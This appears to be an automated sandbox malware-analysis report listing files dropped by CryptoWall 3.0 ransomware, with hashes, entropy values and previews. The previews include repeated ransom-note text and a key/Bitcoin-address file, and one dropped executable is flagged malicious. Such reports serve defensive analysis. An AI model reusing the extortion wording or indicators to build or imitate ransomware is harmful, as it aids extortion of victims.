                                                                                                                          MD5:05B83CB7388292C0AE9B7FD82365325F
                                                                                                                          SHA1:ACB59E69D90E0CB07E640CEA4BFFD7CDC447A379
                                                                                                                          SHA-256:57C99137A45A6A5FC05C8094FBFC39B1CB37038919D092421CDEBA1EE0C65B59
                                                                                                                          SHA-512:4B8E2E7DA595BB02DFD92C78D706F0E4AEFA329C5FD50EEDE1E1935E5E5CB7ED80DC32794511DE44E6839774CB34E9E7F9CAE09F17C216348CE32CACF469616F
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3774
                                                                                                                          Entropy (8bit):7.919865270631616
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDr2KKpXdPjJm+qcrrvjxyg7kYHDS63rNdogCmYEW:GovKpXJjJmpcXvMgPHtQ0W
                                                                                                                          MD5:CFBF54037B241242BA12F5133D729494
                                                                                                                          SHA1:0C54A179826DDE53AE16B2650F301D4CA1340A90
                                                                                                                          SHA-256:0D48742FA5E30D0A0C22865C3DB0E1A2D9BC7487BC768F15CCB03148B984BDC5
                                                                                                                          SHA-512:23966D1F07DC3D0DDE30592762178EF8C373F5ECC12AFF0FC78B8497E93C5BBA604F84896E8A730E493DD670B56E7D222B11CC924C363750D61CDEB443B3A42D
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1246
                                                                                                                          Entropy (8bit):7.567557577813457
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2rF8frayappbN8WeTt/T9CbjnIFmxSlFvvUkmSsrW:c+9U40oDgjGyappbNwTt/GnE02FvvUkX
                                                                                                                          MD5:CA33303BA0FB6CBFF7499FF620601D29
                                                                                                                          SHA1:4C8A461E63226AEBB5A1C86EE1D7EA250827FC84
                                                                                                                          SHA-256:D3AD4F537428C52B34FDBBD80158891E9096C9E4E3315CED568B5B035F27D6C7
                                                                                                                          SHA-512:CE51DB71656900E25251E5F1CFC5CC7DE02383597F71A7A3304A246E74FA7D7026EA61E93718A21AFF1560BD6E78A734C4503459EE5653DC2469C2F2793C2952
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1470
                                                                                                                          Entropy (8bit):7.652145716933632
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2S9kp1VwQ6P/u63t7amnWU96O5VL6aADTn8+zYaYiXRIMKID:c+9U40oDgB9kpS/RsmWU962kTTnj0aYU
                                                                                                                          MD5:6B925A5D3CD2C217CB1BD1153646A8D1
                                                                                                                          SHA1:4DDBD171B549C5447519FDA1321B715BC456F432
                                                                                                                          SHA-256:B9DB27FF938AD6C94096FBA4D7380A1EEC4824214D52C668DDF03E54FAFF28C4
                                                                                                                          SHA-512:90297ADAEB1DE8918A5F0452CD247E05CEC709543B3F05DCD5D6A23F871E5BF5D5CBF0DE97E12B6A11042AEE6466848759E5853F53ECD634EE07BEE2649B6512
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3310
                                                                                                                          Entropy (8bit):7.902166789786186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDZXPZq4AY5YfmWAHKI8Z7jnJGxfrt5QMNm1:Go9Q4T5vW8KzrJGFQMNi
                                                                                                                          MD5:CC7EBB14A12074EE97EF968D9EA3EB8A
                                                                                                                          SHA1:6A6CBBA5A902D6095777A6C5C7F03C5D7859EC75
                                                                                                                          SHA-256:E4EFECD5CDF34C89907407F97A69618363DCFF455764571E5F966A98DD69505A
                                                                                                                          SHA-512:8E4C314C425D5BA43DD020379581677C9401273C6678BEFB0619F368F4536A5A31AD9CFB8DE0F8731F5C09D763B90C33FD5CF22934D9C434E65E7199C6E8FDDA
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6926
                                                                                                                          Entropy (8bit):7.961489942903021
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoMqsyyjDjky1mvi87DbAumlPIQ04P9jbIwMR:GnyyPj9mDDpmRt9jb9s
                                                                                                                          MD5:81D4663E21BC9FE9FD3C6D7AA3089E19
                                                                                                                          SHA1:CDB4A73800E5CE68C25CE5E8D439DD338579CDF5
                                                                                                                          SHA-256:4DC47B5A1B74D5AC76A60012EBF7AA9554EB820DF253452C1406CD79E6374543
                                                                                                                          SHA-512:0D095DFE806C95226A87F5D0F2A9EE6A3D919E5AD7DA22227666A6CCDE37BADF288FDC730A8A42A1EA995022F8FCB6EA8D585A28E246E6F496F53D9B33E4C422
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8942
                                                                                                                          Entropy (8bit):7.972373498955242
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoDWzKHDkyezOWRM2xoIckldMICkv3N3JU32dIJMKU7:GuRDk1z1RM2xoIvldMmv3vU2dI257
                                                                                                                          MD5:0F243A10FE034FCA9F71209F9924A182
                                                                                                                          SHA1:B04D0F2BC3B3E9989E4D4102BBD373CE3B687D1A
                                                                                                                          SHA-256:7219C0AE5D683599BDF3F30910D12C40F0E46ABA41D3262A0EA6C67915E314B1
                                                                                                                          SHA-512:84FF2B862F739D953AC7A40D049D80C251066FB42DC5A8EBFBE892FBBE87A246E029CD73AC2B3AE06B63E4FC15CF6FDC57F9D69C8D543721091C17D63030CF36
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\Desktop\0t8amSU3vd.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):217109
                                                                                                                          Entropy (8bit):7.522628705686142
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:0/kdfrM7AyEfU60/IzCsRzxGmw5oCmK2fk7mzBW+g:aks60/KCs5vL9K2fk7mzBg
                                                                                                                          MD5:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          SHA1:1FA08E8CE2C70DAF4A3456EB53E48484B20D3D12
                                                                                                                          SHA-256:AD340C9EA5510D1F0F6149FAE0BD5349D6E8B01DF4ECCC9A2BB300BE4BC9D981
                                                                                                                          SHA-512:6847B69B8A9D913B46C1ABFB0F1BA91070999CDA1BD3DF6C8229CFDC4B052DC25102D2353548AB436F361083CF9BE5836F118AB508E2DEB3FFDBFDF286B847AA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be.(.. in DOS mode....$.........>...m...m...m..m..m..m...m...m...m...m..ma..m..ma..m...m...m...m...m...m...m...mRich...m................PE..L....FuC..........................................@.........................................................................D...........................................................................................4............................text..."........................... ..`.rdata..............................@..@.data....P... ... ... ..............@....rsrc................@..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):249
                                                                                                                          Entropy (8bit):4.534104668428901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:fm0P3d2jyyj/o/+5dk0TvUdARUPv2neB6y1daK7vvqb1tsShHHGgRUgjuqtv:7tNyj/0+Dv7EARUie0y1daaXqzxbRUgP
                                                                                                                          MD5:20C4ED049DDCEEA6F2E202B41C485B6E
                                                                                                                          SHA1:4ABEA7FFFF723AE300AAD4B2A630FF30896EE960
                                                                                                                          SHA-256:09C3EF5F09267A2A01F39AE47E7CD3A73EC421274E6C68F9411DA2130BB9F0B9
                                                                                                                          SHA-512:658D7A9BDFF130B8D362C1EC215F1D943B42C9CF60F209148F895C2F9D33255D24A03F7885F9BD6068B42B3B0DBBA152C0899BBF1C430AAE7F03DA4F265953C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB..B0894A6F5E3AA8A1CB5A3E6FD5BA56AC18E75483FFB78E021E3937EBEEED2A42..30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC..E722D94C1CAC34B..
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):879822
                                                                                                                          Entropy (8bit):7.999783565202353
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:56jGwk4eMjnsZbcdSzjiV8ZptChrFwwXZKyHQ6M:MX79zsZbcMIowrKOmX
                                                                                                                          MD5:98D1DD45E84C2277FAD0EB8368A2CE0A
                                                                                                                          SHA1:82C9691BB6AEE61B8025EDD6E25082BFA0C6D8A4
                                                                                                                          SHA-256:8B4D65308DAAD24E20D4433595867D645C5BC64F8EF1D4B069FE8ABDACE4DBA8
                                                                                                                          SHA-512:3040B0E653477EF46457EFB9B8509F606D25584EE2980722FE2146FA8FF8BABC540200B03D5046C4E558853E7A61DBB574EDA9DB98FE4CEE6690A791B7B63A58
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):846366
                                                                                                                          Entropy (8bit):7.999816925536536
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:tVE53K42nu8FLFM/WyZdxqniAexD8OAvl6U0Y:oa434GlqniAe58OqL
                                                                                                                          MD5:984F5F4321D6FD7BC9419E24060D15A0
                                                                                                                          SHA1:62F2F6C3887CFBB2BAF3E98138C03E22C5C8622C
                                                                                                                          SHA-256:271C10D65657D042D0822C9530DE1D8489171C6EF33089024FC61B62AC5E8AC9
                                                                                                                          SHA-512:89C764D416E4A02840E155DD6913C4CF9F54C689D88E5C3253C4E3C2E8C1B8217CFE4DF59D80D0B8E946A3E8789727128B87498A69BA5CC111E5E82D3C7D4573
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):596126
                                                                                                                          Entropy (8bit):7.999628599330229
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:oEcuRGrVjPy7PM2q+xCorpiDwhQV6Nb3HIDFKubFZ2vuQzgYx:TcuRwVjPyzMxrOpiDwhpNbeFxI
                                                                                                                          MD5:C29B66447212572A9F0ACF11D2DB0229
                                                                                                                          SHA1:E55C867AE6B8B28FB1895E45D1606062F53C06F5
                                                                                                                          SHA-256:205BE3BE3BEC79F058B746ACB7D9C5C6B5DF6A7238ED31F16E5805BBC9FE050A
                                                                                                                          SHA-512:6E131BA63E6E8C77A981301F20E78384A99C73B53D7D3050D48B92356C0449D6972DEC1D571E64C747AC008D196E37574BD5E3A34ECFD3B41F197F0DB8C7EE0F
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):776542
                                                                                                                          Entropy (8bit):7.999757453156257
                                                                                                                          Encrypted:true
